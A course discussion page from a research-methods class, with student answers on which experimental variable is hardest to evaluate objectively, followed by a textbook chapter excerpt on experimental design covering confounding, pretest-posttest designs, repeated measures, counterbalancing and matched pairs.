Which one of the following types of variables is most difficult to evaluate objectively in a true experiment?

1. Which one of the following types of variables is most difficult to evaluate objectively in a true experiment? Explain why you think that (See instructions below).

a)      Dependent variable

b)     Independent variable

c)      Confounding variable

d)     Extraneous variable

e)      None of the above

Instructions: Make a selection, provide a concept definition (text), and support your opinion on the selection with an example from research that illustrates the concept. Do so in a maximum of 250 words. Use credible, peer-reviewed sources. Credible sources include course materials, University Library research that is peer reviewed, and Internet sites ending in .edu or .gov, with the one exception of research pulled from the www.apa.org site. If research is pulled from the APA site, use the www.apa.org


1. The variable that is most difficult to evaluate objectively in a true experiment is the extraneous variable. According to Cozby & Bates (2015), when an aerobics group and a video-viewing group are tested in different rooms, “it would be impossible to know whether the better mood of the participants in the aerobics group was due to the exercise or to the presence of windows” (p. 162). With extraneous variables, many other factors come into play: does either room have more doors, air conditioning, heating, windows, etc.? Those things can change the response of each group, making the data collected unreliable. In an article I found on women who used cocaine while pregnant, the research took place over quite a few years. According to Richardson & Day (1999), “One of the issues that were identified was the failure to control adequately for extraneous variables” (p. 234). The researchers realized that some of the studies were inadequate and that, most of the time, information was not interpreted correctly for the clients or their providers. The lack of communication caused further issues and endangered some of those pregnancies. Because the research on prenatal cocaine exposure was performed over such a lengthy period of time, it is hard to make sure that nothing extraneous affects the study. Without an attempt to eliminate those extraneous variables, the study becomes compromised and the data do not appear as relevant as those of other studies.


Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.


Richardson, G. A., & Day, N. L. (1999). Studies of prenatal cocaine exposure: Assessing the influence of extraneous variables. Journal of Drug Issues, 29(2), 225-236. Retrieved from https://search-proquest-com.contentproxy.phoenix.edu/docview/208833439?accountid=458

2. Independent variables are tested to see if they have an effect on the dependent variable, which is why extraneous variables (those not intentionally studied) are considered undesirable, and they are sometimes difficult for the researcher to control (Cozby & Bates, 2015). For example, although an extraneous variable is not a variable of interest, it may still influence the outcome of a research study or experiment. According to Losen & Oyinalde (2014), the extraneous variable has its positives, as it can be used to provide alternative explanations for an experiment's effects, but it must be controlled for and must not take the place of the independent variable, which has to determine the actual effects.

References:

Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.

Losen, A., & Oyinalde, A. O. (2014). Extraneous Effects of Race, Gender, and Race-Gender Homo- and Heterophily Conditions on Data Quality. 4(1). Directory of Open Access Journals. DOI: 10.1177/2158244014525418

3. The variable that I think is most difficult to evaluate is the confounding variable. Our reading from Chapter 4 discusses the confounding variable in depth and explains it as a third variable that is hard to get a read on. According to Cozby & Bates (2015), a confounding variable is what we call a third variable when it is uncontrolled and operating. When a third variable is operating, it can cause a huge problem because it introduces an alternative explanation, which can reduce the overall validity of the study (Cozby & Bates, 2015). If two variables are confounded, they are so intertwined that you cannot determine which of the variables is operating in a situation (Cozby & Bates, 2015). The example they give is that exercise may reduce anxiety, but income could be operating as a third variable (Cozby & Bates, 2015). The third variable can be extraneous to the two variables being studied, and any number of third variables may be responsible for a relationship between two variables (Cozby & Bates, 2015).

Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.

4. Confounding variables can be difficult for the researcher to control (Cozby & Bates, 2015). In fact, researchers are said to fail to control them, because eliminating the underlying problems requires human judgment. A confounding variable also makes it difficult to establish a link between treatments and outcomes. According to Brodt, Dettori, and Skelly (2012), confounding happens when effects are mixed: confounding factors may make a treatment appear to be associated with an outcome when in reality there is no association. In medical research that compares treatment groups, researchers should consider whether an effect is truly due to the exposure or to an alternative explanation; therefore, appropriate adjustment methods have to be used, and these require human judgment.


Brodt, E., Dettori, J. R., & Skelly, A. C. (2012). Assessing bias: The importance of considering confounding. NCBI. Retrieved from https://www.ncbi.nlm.nih.gov

Cozby, P. C., & Bates, S. C. (2015). Methods in Behavioral Research (12th ed.). New York, NY: McGraw-Hill.

Experimental Design Chapter 8


· Define confounding variable, and describe how confounding variables are related to internal validity.

· Describe the posttest-only design and the pretest-posttest design, including the advantages and disadvantages of each design.

· Contrast an independent groups (between-subjects) design with a repeated measures (within-subjects) design.

· Summarize the advantages and disadvantages of using a repeated measures design.

· Describe a matched pairs design, including reasons to use this design.

IN THE EXPERIMENTAL METHOD, THE RESEARCHER ATTEMPTS TO CONTROL ALL EXTRANEOUS VARIABLES. Suppose you want to test the hypothesis that exercise affects mood. To do this, you might put one group of people through a 1-hour aerobics workout and put another group in a room where they are asked to watch a video of people exercising for an hour. All participants would then complete the same mood assessment. Now suppose that the people in the aerobics class rate themselves as happier than those in the video viewing condition. Can the difference in mood be attributed to the difference in the exercise? Yes, if there is no other difference between the groups. However, what if the aerobics group was given the mood assessment in a room with windows but the video-only group was tested in a room without windows? In that case, it would be impossible to know whether the better mood of the participants in the aerobics group was due to the exercise or to the presence of windows.


Recall from Chapter 4 that the experimental method has the advantage of allowing a relatively unambiguous interpretation of results. The researcher manipulates the independent variable to create groups and then compares the groups on the dependent variable. All other variables are kept constant, either through direct experimental control or through randomization. If the groups are different, the researcher can conclude that the independent variable caused the results because the only difference between the groups is the manipulated variable.

Although the task of designing an experiment is logically elegant and exquisitely simple, you should be aware of possible pitfalls. In the hypothetical exercise experiment just described, the variables of exercise and window presence are confounded. The window variable was not kept constant. A confounding variable is a variable that varies along with the independent variable; confounding occurs when the effects of the independent variable and an uncontrolled variable are intertwined so you cannot determine which of the variables is responsible for the observed effect. If the window variable had been held constant, both the exercise and the video condition would have taken place in identical rooms. That way, the effect of windows would not be a factor to consider when interpreting the difference between the groups.

In short, both rooms in the exercise experiment should have had windows or both should have been windowless. Because one room had windows and one room did not, any difference in the dependent variable (mood) cannot be attributed solely to the independent variable (exercise). An alternative explanation can be offered: The difference in mood may have been caused, at least in part, by the window variable.

Good experimental design requires eliminating possible confounding variables that could result in alternative explanations. A researcher can claim that the independent variable caused the results only by eliminating competing, alternative explanations. When the results of an experiment can confidently be attributed to the effect of the independent variable, the experiment is said to have internal validity (remember that internal validity refers to the ability to draw conclusions about causal relationships from our data; see Chapter 4). To achieve good internal validity, the researcher must design and conduct the experiment so that only the independent variable can be the cause of the results (Campbell & Stanley, 1966).

This chapter will focus on true experimental designs, which provide the highest degree of internal validity. In Chapter 11, we will turn to an examination of quasi-experimental designs, which lack the crucial element of random assignment while attempting to infer that an independent variable had an effect on a dependent variable. Internal validity is discussed further in Chapter 11 and external validity, the extent to which findings may be generalized, is the focus of Chapter 14.


The simplest possible experimental design has two variables: the independent variable and the dependent variable. The independent variable has a minimum of two levels, an experimental group and a control group. Researchers must make every effort to ensure that the only difference between the two groups is the manipulated (independent) variable.

Remember, the experimental method involves control over extraneous variables, through either keeping such variables constant (experimental control) or using randomization to make sure that any extraneous variables will affect both groups equally. The basic, simple experimental design can take one of two forms: a posttest-only design or a pretest-posttest design.

Posttest-Only Design

A researcher using a posttest-only design must (1) obtain two equivalent groups of participants, (2) introduce the independent variable, and (3) measure the effect of the independent variable on the dependent variable. The design looks like this:

Thus, the first step is to choose the participants and assign them to the two groups. The procedures used must achieve equivalent groups to eliminate any potential selection differences: The people selected to be in the conditions cannot differ in any systematic way. For example, you cannot select high-income individuals to participate in one condition and low-income individuals for the other. The groups can be made equivalent by randomly assigning participants to the two conditions or by having the same participants participate in both conditions. Recall from Chapter 4 that random assignment is done in such a way that each participant is assigned to a condition randomly without regard to any personal characteristic of the individual. The R in the diagram means that participants were randomly assigned to the two groups.

Next, the researcher must choose two levels of the independent variable, such as an experimental group that receives a treatment and a control group that does not. Thus, a researcher might study the effect of reward on motivation by offering a reward to one group of children before they play a game and offering no reward to children in the control group. A study testing the effect of a treatment method for reducing smoking could compare a group that receives the treatment with a control group that does not. Another approach would be to use two different amounts of the independent variable—that is, to use more reward in one group than the other or to compare the effects of different amounts of relaxation training designed to help people quit smoking (e.g., 1 hour of training compared with 10 hours). Another approach would be to include two qualitatively different conditions; for example, one group of test-anxious students might write about their anxiety and the other group could participate in a meditation exercise prior to a test. All of these approaches would provide a basis for comparison of the two groups. (Of course, experiments may include more than two groups; for example, we might compare two different smoking cessation treatments along with a no-treatment control group—these types of experimental designs will be described in Chapter 10).

Finally, the effect of the independent variable is measured. The same measurement procedure is used for both groups, so that comparison of the two groups is possible. Because the groups were equivalent prior to the introduction of the independent variable and there were no confounding variables, any difference between the groups on the dependent variable must be attributed to the effect of the independent variable. This elegant experimental design has a high degree of internal validity. That is, we can confidently conclude that the independent variable caused the dependent variable. In actuality, a statistical significance test would be used to assess the difference between the groups. However, we do not need to be concerned with statistics at this point. An experiment must be well designed, and confounding variables must be eliminated before we can draw conclusions from statistical analyses.

Pretest-Posttest Design

The only difference between the posttest-only design and the pretest-posttest design is that in the latter a pretest is given before the experimental manipulation is introduced:

This design makes it possible to ascertain that the groups were, in fact, equivalent at the beginning of the experiment. However, this precaution is usually not necessary if participants have been randomly assigned to the two groups. With a sufficiently large sample of participants, random assignment will produce groups that are virtually identical in all respects.

You are probably wondering how many participants are needed in each group to make sure that random assignment has made the groups equivalent. The larger the sample, the less likelihood there is that the groups will differ in any systematic way prior to the manipulation of the independent variable. In addition, as sample size increases, so does the likelihood that any difference between the groups on the dependent variable is due to the effect of the independent variable. There are formal procedures for determining the sample size needed to detect a statistically significant effect, but as a rule of thumb you will probably need a minimum of 20 to 30 participants per condition. In some areas of research, many more participants may be necessary. Further issues in determining the number of participants needed for an experiment are described in Chapter 13.
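The relationship between sample size and group equivalence can be illustrated with a small simulation. This is only a sketch under stated assumptions: the trait scores (mean 50, standard deviation 10), the number of simulated experiments, and the function name `mean_baseline_gap` are all hypothetical and do not come from the chapter.

```python
import random
import statistics


def mean_baseline_gap(n_per_group, n_simulations=500, seed=0):
    """Average absolute gap between two group means on a pre-existing trait
    after random assignment, across many simulated experiments."""
    rng = random.Random(seed)
    gaps = []
    for _ in range(n_simulations):
        # Hypothetical trait scores for every participant in one experiment.
        scores = [rng.gauss(50, 10) for _ in range(2 * n_per_group)]
        rng.shuffle(scores)  # random assignment: first half vs. second half
        group_a = scores[:n_per_group]
        group_b = scores[n_per_group:]
        gaps.append(abs(statistics.mean(group_a) - statistics.mean(group_b)))
    return statistics.mean(gaps)


# Compare the typical pre-manipulation gap for small and large groups.
for n in (5, 25, 100):
    print(n, round(mean_baseline_gap(n), 2))
```

Under these assumptions, the typical gap between the groups before any manipulation shrinks as the number of participants per condition grows, which is the point of the rule of thumb.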

Comparing Posttest-Only and Pretest-Posttest Designs

Each of these two experimental designs has advantages and disadvantages that influence the decision whether to include or omit a pretest. The first decision factor concerns the equivalence of the groups in the experiment. Although randomization is likely to produce equivalent groups, it is possible that, with small sample sizes, the groups will not be equal. Thus, a pretest enables the researcher to assess whether the groups are in fact equivalent to begin with.

Sometimes, a pretest is necessary to select the participants in the experiment. A researcher might need to give a pretest to find the lowest or highest scorers on a smoking measure, a math anxiety test, or a prejudice measure. Once identified, the participants would be randomly assigned to the experimental and control groups.

The pretest-posttest design immediately makes us focus on the change from pretest to posttest. This emphasis on change is incorporated into the analysis of the group differences. Also, the extent of change in each individual can be examined. If a smoking reduction program appears to be effective for some individuals but not others, attempts can be made to find out why.

A pretest is also necessary whenever there is a possibility that participants will drop out of the experiment; this is most likely to occur in a study that lasts over a long time period. The dropout factor in experiments is called attrition or mortality. People may drop out for reasons unrelated to the experimental manipulation, such as illness; sometimes, however, attrition is related to the experimental manipulation. Even if the groups are equivalent to begin with, different attrition rates can make them nonequivalent. How might mortality affect a treatment program designed to reduce smoking? One possibility is that the heaviest smokers in the experimental group might leave the program. Therefore, when the posttest is given, only the light smokers would remain, so that a comparison of the experimental and control groups would show less smoking in the experimental group even if the program had no effect. In this way, attrition (mortality) becomes an alternative explanation for the results. Use of a pretest enables you to assess the effects of attrition; you can look at the pretest scores of the dropouts and know whether their scores differed from the scores of the individuals completing the study. Thus, with the pretest, it is possible to examine whether attrition is a plausible alternative explanation—an advantage in the experimental design.
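The attrition check described above can be sketched in a few lines. The participant IDs, the pretest scores (cigarettes per day), and the dropout list are invented for illustration; they are not data from any study.

```python
import statistics

# Hypothetical pretest scores (cigarettes per day) in the experimental group.
pretest = {"p1": 30, "p2": 28, "p3": 12, "p4": 10, "p5": 8, "p6": 26}
# Hypothetical participants who left before the posttest.
dropouts = {"p1", "p2", "p6"}


def attrition_check(pretest_scores, dropped):
    """Return (mean pretest score of dropouts, mean pretest score of completers)."""
    dropped_scores = [s for pid, s in pretest_scores.items() if pid in dropped]
    completer_scores = [s for pid, s in pretest_scores.items() if pid not in dropped]
    return statistics.mean(dropped_scores), statistics.mean(completer_scores)


dropout_mean, completer_mean = attrition_check(pretest, dropouts)
print("dropouts:", dropout_mean, "completers:", completer_mean)
```

In this made-up case the dropouts were the heaviest smokers at pretest, so a lower posttest average among the remaining participants could reflect attrition rather than the program.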

One disadvantage of a pretest, however, is that it may be time-consuming and awkward to administer in the context of the particular experimental procedures being used. Perhaps most important, a pretest can sensitize participants to what you are studying, enabling them to figure out what is being studied and (potentially) why. They may then react differently to the manipulation than they would have without the pretest. When a pretest affects the way participants react to the manipulation, it is very difficult to generalize the results to people who have not received a pretest. That is, the independent variable may not have an effect in the real world, where pretests are rarely given. We will examine this issue more fully in Chapter 14.

If awareness of the pretest is a problem, the pretest can be disguised. One way to do this is by administering it in a completely different situation with a different experimenter. Another approach is to embed the pretest in a set of irrelevant measures so it is not obvious that the researcher is interested in a particular topic.

It is also possible to assess the impact of the pretest directly with a combination of both the posttest-only and the pretest-posttest design. In this design, half the participants receive only the posttest, and the other half receive both the pretest and the posttest (see Figure 8.1). This is formally called a Solomon four-group design. If there is no impact of the pretest, the posttest scores will be the same in the two control groups (with and without the pretest) and in the two experimental groups. Garvin and Damson (2008) employed a Solomon four-group design to study the effect of viewing female fitness magazine models on a measure of depressed mood. Female college students spent 30 minutes viewing either the fitness magazines or magazines such as National Geographic. Two possible outcomes of this study are shown in Figure 8.2. The top graph illustrates an outcome in which the pretest has no impact: The fitness magazine viewing results in higher depression in both the posttest-only and the pretest-posttest condition. This is what was found in the study. The lower graph shows an outcome in which there is a difference between the treatment and control groups when there is a pretest, but there is no group difference when the pretest is absent.


Figure 8.1. Solomon four-group design


Figure 8.2. Examples of outcomes of Solomon four-group design


Recall that there are two basic ways of assigning participants to experimental conditions. In one procedure, participants are randomly assigned to the various conditions so that each participates in only one group. This is called an independent groups design. It is also known as a between-subjects design because comparisons are made between different groups of participants. In the other procedure, participants are in all conditions. In an experiment with two conditions, for example, each participant is assigned to both levels of the independent variable. This is called a repeated measures design, because each participant is measured after receiving each level of the independent variable. You will also see this called a within-subjects design; in this design, comparisons are made within the same group of participants (subjects). In the next two sections, we will examine each of these designs in detail.


In an independent groups design, different participants are assigned to each of the conditions using random assignment. This means that the decision to assign an individual to a particular condition is completely random and beyond the control of the researcher. For example, you could ask for the participant’s month of birth; individuals born in odd-numbered months would be assigned to one group and those born in even-numbered months would be assigned to the other group. In practice, researchers use a sequence of random numbers to determine assignment. Such numbers come from a random number generator such as Research Randomizer, available online at http://www.randomizer.org or QuickCalcs at http://www.graphpad.com/quickcalcs/randomize1.cfm; Excel can also generate random numbers. These programs allow you to randomly determine the assignment of each participant to the various groups in your study. Random assignment will prevent any systematic biases, and the groups can be considered equivalent in terms of participant characteristics such as income, intelligence, age, personality, and political attitudes. In this way, participant differences cannot be an explanation for results of the experiment. As we noted in Chapter 4, in an experiment on the effects of exercise on anxiety, lower levels of anxiety in the exercise group than in the no-exercise group cannot be explained by saying that people in the groups are somehow different on characteristics such as income, education, or personality.
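A random number generator can be used for assignment along the following lines. This is a minimal sketch using Python's standard `random` module, not the procedure of any of the tools named above; the function name `randomly_assign`, the participant labels, and the condition names are hypothetical.

```python
import random


def randomly_assign(participants, conditions, seed=None):
    """Shuffle participants, then deal them out to conditions in turn so
    that group sizes are as equal as possible."""
    rng = random.Random(seed)
    shuffled = list(participants)
    rng.shuffle(shuffled)  # order now depends only on chance
    groups = {condition: [] for condition in conditions}
    for i, person in enumerate(shuffled):
        groups[conditions[i % len(conditions)]].append(person)
    return groups


# Hypothetical participants P1..P20 and two hypothetical conditions.
participants = [f"P{i}" for i in range(1, 21)]
groups = randomly_assign(participants, ["exercise", "no exercise"], seed=42)
for condition, members in groups.items():
    print(condition, members)
```

Because the shuffle ignores every personal characteristic, no trait of a participant can systematically determine the group that person ends up in.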

An alternative procedure is to have the same individuals participate in all of the groups. This is called a repeated measures experimental design.


Consider an experiment investigating the relationship between the meaningfulness of material and the learning of that material. In an independent groups design, one group of participants is given highly meaningful material to learn and another group receives less meaningful material. For example, the meaningful material might include a story relating the material to a real-life event. In a repeated measures design, the same individuals participate in both conditions. Thus, participants might first read low-meaningful material and take a recall test to measure learning; the same participants would then read high-meaningful material and take the recall test. You can see why this is called a repeated measures design; participants are repeatedly measured on the dependent variable after being in each condition of the experiment.

Advantages and Disadvantages of Repeated Measures Design

The repeated measures design has several advantages. An obvious one is that fewer research participants are needed, because each individual participates in all conditions. When participants are scarce or when it is costly to run each individual in the experiment, a repeated measures design may be preferred. In much research on perception, for instance, extensive training of participants is necessary before the actual experiment can begin. Such research often involves only a few individuals who participate in all conditions of the experiment.

An additional advantage of repeated measures designs is that they are extremely sensitive to finding statistically significant differences between groups. This is because we have data from the same people in both conditions. To illustrate why this is important, consider possible data from the recall experiment. Using an independent groups design, the first three participants in the high-meaningful condition had scores of 68, 81, and 92. The first three participants in the low-meaningful condition had scores of 64, 78, and 85. If you calculated an average score for each condition, you would find that the average recall was a bit higher when the material was more meaningful. However, there is a lot of variability in the scores in both groups. You certainly are not finding that everyone in the high-meaningful condition has high recall and everyone in the other condition has low recall. The reason for this variability is that people differ—there are individual differences in recall abilities, so there is a range of scores in both conditions. This is part of “random error” in the scores that we cannot explain.

However, if the same scores were obtained from the first three participants in a repeated measures design, the conclusions would be much different. Let’s line up the recall scores for the two conditions:

Participant    High-meaningful    Low-meaningful
1              68                 64
2              81                 78
3              92                 85

With a repeated measures design, the individual differences can be seen and explained. It is true that some people score higher than others because of individual differences in recall abilities, but now you can much more clearly see the effect of the independent variable on recall scores. It is much easier to separate the systematic individual differences from the effect of the independent variable: Scores are higher for every participant in the high-meaningful condition. As a result, we are much more likely to detect an effect of the independent variable on the dependent variable.
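The same point can be checked numerically with the six scores given above. This sketch pairs the scores by participant, which assumes the repeated measures reading of the data; the variable names are illustrative.

```python
import statistics

# Recall scores from the text, listed in participant order.
high = [68, 81, 92]  # high-meaningful condition
low = [64, 78, 85]   # low-meaningful condition

# Independent groups view: compare condition averages against the spread
# of scores within a condition.
mean_high = statistics.mean(high)
mean_low = statistics.mean(low)
spread_within_condition = statistics.stdev(high)

# Repeated measures view: each participant serves as his or her own
# comparison, so individual differences in recall ability cancel out.
differences = [h - l for h, l in zip(high, low)]
spread_of_differences = statistics.stdev(differences)

print("condition means:", round(mean_high, 2), round(mean_low, 2))
print("per-participant differences:", differences)
print("spread within a condition:", round(spread_within_condition, 2))
print("spread of the differences:", round(spread_of_differences, 2))
```

Every per-participant difference is positive, and the differences vary far less than the raw scores do, which is why the repeated measures design is more sensitive to the effect.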

The major problem with a repeated measures design stems from the fact that the different conditions must be presented in a particular sequence. Suppose that there is greater recall in the high-meaningful condition. Although this result could be caused by the manipulation of the meaningfulness variable, the result could also simply be an order effect—the order of presenting the treatments affects the dependent variable. Thus, greater recall in the high-meaningful condition could be attributed to the fact that the high-meaningful task came second in the order of presentation of the conditions. Performance on the second task might improve merely because of the practice gained on the first task. This improvement is in fact called a practice effect, or learning effect. It is also possible that a fatigue effect could result in a deterioration in performance from the first to the second condition as the research participant becomes tired, bored, or distracted.

It is also possible for the effect of the first treatment to carry over to influence the response to the second treatment—this is known as a carryover effect. Suppose the independent variable is severity of a crime. After reading about the less severe crime, the more severe one might seem much worse to participants than it normally would. In addition, reading about the severe crime might subsequently cause participants to view the less severe crime as much milder than they normally would. In both cases, the experience with one condition carried over to affect the response to the second condition. In this example, the carryover effect was a psychological effect of the way that the two situations contrasted with one another.

A carryover effect may also occur when the first condition produces a change that is still influencing the person when the second condition is introduced. Suppose the first condition involves experiencing failure at an important task. This may result in a temporary increase in stress responses. How long does it take before the person returns to a normal state? If the second condition is introduced too soon, the stress may still be affecting the participant.

There are two approaches to dealing with order effects. The first is to employ counterbalancing techniques. The second is to devise a procedure in which the interval between conditions is long enough to minimize the influence of the first condition on the second.


Complete counterbalancing In a repeated measures design, it is very important to counterbalance the order of the conditions. With complete counterbalancing, all possible orders of presentation are included in the experiment. In the example of a study on learning high- and low-meaningful material, half of the participants would be randomly assigned to the low-high order, and the other half would be assigned to the high-low order. This design is illustrated as follows:

By counterbalancing the order of conditions, it is possible to determine the extent to which order is influencing the results. In the hypothetical memory study, you would know whether the greater recall in the high-meaningful condition is consistent for both orders; you would also know the extent to which a practice effect is responsible for the results.

Counterbalancing principles can be extended to experiments with three or more groups. With three groups, there are 6 possible orders (3! = 3 × 2 × 1 = 6). With four groups, the number of possible orders increases to 24 (4! = 4 × 3 × 2 × 1 = 24); you would need a minimum of 24 participants to represent each order, and you would need 48 participants to have only two participants per order. Imagine the number of orders possible in an experiment by Shepard and Metzler (1971). In their basic experimental paradigm, each participant is shown a three-dimensional object along with the same figure rotated at one of 10 different angles ranging from 0 degrees to 180 degrees (see the sample objects illustrated in Figure 8.3). Each time, the participant presses a button when it is determined that the two figures are the same or different. The dependent variable is reaction time—the amount of time it takes to decide whether the figures are the same or different. The results show that reaction time becomes longer as the angle of rotation increases away from the original. In this experiment with 10 conditions, there are 3,628,800 possible orders! Fortunately, there are alternatives to complete counterbalancing that still allow researchers to draw valid conclusions about the effect of the independent variable without running some 3.6 million tests.
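The order counts quoted above follow from the factorial, and they can be confirmed by enumerating the orders directly. This is a small sketch using Python's standard library; the condition labels are placeholders.

```python
import math
from itertools import permutations

# Number of possible orders for k conditions is k! (k factorial).
for k in (2, 3, 4, 10):
    print(k, "conditions:", math.factorial(k), "orders")

# Complete counterbalancing for the two-condition recall study.
two_orders = list(permutations(["low", "high"]))
print(two_orders)

# With three placeholder conditions, all six orders can be listed.
three_orders = list(permutations("ABC"))
for order in three_orders:
    print("".join(order))
```

Listing the orders is practical for two or three conditions, but the count grows so quickly that enumeration stops being useful well before ten conditions.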


Figure 8.3. Three-dimensional figures used by Shepard and Metzler (1971)

Adapted from “Mental Rotation of Three-Dimensional Objects,” by R. N. Shepard and J. Metzler, 1971, Science, 171, pp. 701–703.

Latin squares. A technique to control for order effects without having all possible orders is to construct a Latin square: a limited set of orders constructed to ensure that (1) each condition appears at each ordinal position and (2) each condition precedes and follows each other condition one time. Using a Latin square to determine order controls for most order effects without having to include all possible orders. Suppose you replicated the Shepard and Metzler (1971) study using only 4 of the 10 rotations: 0, 60, 120, and 180 degrees. A Latin square for these four conditions is shown in Figure 8.4. Each row in the square is one of the orders of the conditions (the conditions are labeled A, B, C, and D). The number of orders in a Latin square is equal to the number of conditions; thus, if there are four conditions, there are four orders. When you conduct your study using the Latin square to determine order, you need at least one participant per row. Usually, you will have two or more participants per row; the number of participants tested in each order must be equal.


Figure 8.4. A Latin square with four conditions

Note: The four conditions were randomly given letter designations. A = 60 degrees, B = 0 degrees, C = 180 degrees, and D = 120 degrees. Each row represents a different order of running the conditions.
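A square with both properties can be built and checked mechanically. The sketch below uses one common construction for an even number of conditions (a first row following the pattern 1st, 2nd, last, 3rd, and so on, with each later row shifted by one); it is an assumption that this is a suitable construction, and it is not necessarily the square printed in Figure 8.4. The function names are hypothetical, property (2) is read as "immediately precedes and follows," and the letter-to-angle mapping is taken from the note above.

```python
def balanced_latin_square(conditions):
    """Build a balanced Latin square for an even number of conditions."""
    n = len(conditions)
    if n % 2 != 0:
        raise ValueError("this construction needs an even number of conditions")
    # First row as index pattern: 0, 1, n-1, 2, n-2, ...
    first, low, high, take_low = [0], 1, n - 1, True
    while len(first) < n:
        if take_low:
            first.append(low)
            low += 1
        else:
            first.append(high)
            high -= 1
        take_low = not take_low
    # Each later row shifts every entry of the first row by one (wrapping around).
    return [[conditions[(i + shift) % n] for i in first] for shift in range(n)]

def is_balanced(square):
    """Check both properties: every condition at every position, and every
    ordered pair of adjacent conditions occurring exactly once."""
    n = len(square)
    positions_ok = all(len({row[pos] for row in square}) == n for pos in range(n))
    pairs = [(row[i], row[i + 1]) for row in square for i in range(n - 1)]
    return positions_ok and len(set(pairs)) == n * (n - 1)

degrees = {"A": 60, "B": 0, "C": 180, "D": 120}  # mapping from the note above
square = balanced_latin_square(["A", "B", "C", "D"])
for row in square:
    print(" ".join(row), "|", [degrees[c] for c in row])
print("balanced:", is_balanced(square))
```

Each printed row is one order of conditions; participants would be divided equally among the four rows.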

Time Interval Between Treatments

In addition to counterbalancing the order of treatments, researchers need to carefully determine the time interval between presentation of treatments and possible activities between them. A rest period may counteract a fatigue effect; attending to an unrelated task between treatments may reduce the possibility that participants will contrast the first treatment with the second. If the treatment is the administration of a drug that takes time to wear off, the interval between treatments may have to be a day or more. Lane, Cherek, Tcheremissine, Lieving, and Pietras (2005) used a repeated measures design to study the effect of marijuana on risk taking. The subjects came to the lab in the morning and passed a drug test. They were then given one of three marijuana doses. The dependent variable was a measure of risk taking. Subjects were tested in this way for each dosage. Because of the time necessary for the effects of the drug to wear off, the three conditions were run on separate days at least five days apart. A similarly long time interval would be needed with procedures that produce emotional changes, such as heightened anxiety or anger. You may have noted that introduction of an extended time interval may create a separate problem: Participants will have to commit to the experiment for a longer period of time. This can make it more difficult to recruit volunteers, and if the study extends over two or more days, some participants may drop out of the experiment altogether. And for the record, increased marijuana doses did result in riskier decisions.

Choosing Between Independent Groups and Repeated Measures Designs

Repeated measures designs have two major advantages over independent groups designs: (1) a reduction in the number of participants required to complete the experiment and (2) greater control over participant differences and thus greater ability to detect an effect of the independent variable. As noted previously, in certain areas of research, these advantages are very important. However, the disadvantages of repeated measures designs and the precautions required to deal with them are usually sufficient reasons for researchers to use independent groups designs.

A very different consideration in whether to use a repeated measures design concerns generalization to conditions in the “real world.” Greenwald (1976) has pointed out that in actual everyday situations, we sometimes encounter independent variables in an independent groups fashion: We encounter only one condition without a contrasting comparison. However, some independent variables are most frequently encountered in a repeated measures fashion: Both conditions appear, and our responses occur in the context of exposure to both levels of the independent variable. Thus, for example, if you are interested in how a defendant’s characteristics affect jurors, an independent groups design may be most appropriate because actual jurors focus on a single defendant in a trial. However, if you are interested in the effects of a job applicant’s characteristics on employers, a repeated measures design would be reasonable because employers typically consider several applicants at once. Whether to use an independent groups or repeated measures design may be partially determined by these generalization issues.

Finally, any experimental procedure that produces a relatively permanent change in an individual cannot be used in a repeated measures design. Examples include a psychotherapy treatment or a surgical procedure such as the removal of brain tissue.


A somewhat more complicated method of assigning participants to conditions in an experiment is called a matched pairs design. Instead of simply randomly assigning participants to groups, the goal is to first match people on a participant variable such as age or a personality trait (see Chapter 4). The matching variable will be either the dependent measure or a variable that is strongly related to the dependent variable. For example, in a learning experiment, participants might be matched on the basis of scores on a cognitive ability measure or even grade point average. If cognitive ability is not related to the dependent measure, however, matching would be a waste of time. The goal is to achieve the same equivalency of groups that is achieved with a repeated measures design without the necessity of having the same participants in both conditions. The design looks like this:

When using a matched pairs design, the first step is to obtain a measure of the matching variable from each individual. The participants are then rank ordered from highest to lowest based on their scores on the matching variable. Now the researcher can form matched pairs that are approximately equal on the characteristic (the highest two participants form the first pair, the next two form the second pair, and so on). Finally, the members of each pair are randomly assigned to the conditions in the experiment. (Note that there are methods of matching pairs of individuals on the basis of scores derived from multiple variables; these methods are described briefly in Chapter 11.)
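The three steps just described (rank, pair, randomly assign within each pair) can be sketched as follows. Everything named here is hypothetical: the function `matched_pairs_assignment`, the condition labels, the participant labels, and the grade point averages used as the matching variable. The sketch covers matching on a single variable only.

```python
import random

def matched_pairs_assignment(scores, seed=None):
    """Assign participants to two conditions using matched pairs.

    scores: dict mapping each participant to a score on the matching variable.
    Returns (pairs, assignment). Requires an even number of participants.
    """
    if len(scores) % 2 != 0:
        raise ValueError("an even number of participants is required")
    rng = random.Random(seed)
    # Step 1: rank order participants from highest to lowest score.
    ranked = sorted(scores, key=scores.get, reverse=True)
    pairs, assignment = [], {}
    # Step 2: adjacent participants in the ranking form a pair.
    for i in range(0, len(ranked), 2):
        pair = [ranked[i], ranked[i + 1]]
        pairs.append(tuple(pair))
        # Step 3: randomly decide which member gets which condition.
        rng.shuffle(pair)
        assignment[pair[0]] = "condition_1"
        assignment[pair[1]] = "condition_2"
    return pairs, assignment

# Hypothetical grade point averages for six participants.
gpa = {"P1": 3.9, "P2": 2.1, "P3": 3.5, "P4": 2.8, "P5": 3.0, "P6": 2.4}
pairs, assignment = matched_pairs_assignment(gpa, seed=7)
for a, b in pairs:
    print(f"{a} ({gpa[a]}) -> {assignment[a]};  {b} ({gpa[b]}) -> {assignment[b]}")
```

Because each pair contributes one member to each condition, the two groups start out roughly equal on the matching variable regardless of how the within-pair coin flips fall.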

A matched pairs design ensures that the groups are equivalent (on the matching variable) prior to introduction of the independent variable manipulation. This assurance could be particularly important with small sample sizes, because random assignment procedures are more likely to produce equivalent groups as the sample size increases. Matching, then, is most likely to be used when only a few participants are available or when it is very costly to run large numbers of individuals in the experiment—as long as there is a strong relationship between a dependent measure and the matching variable. The result is a greater ability to detect a statistically significant effect of the independent variable because it is possible to account for individual differences in responses to the independent variable, just as we saw with a repeated measures design. (The issues of variability and statistical significance are discussed further in Chapter 13 and Appendix C.)

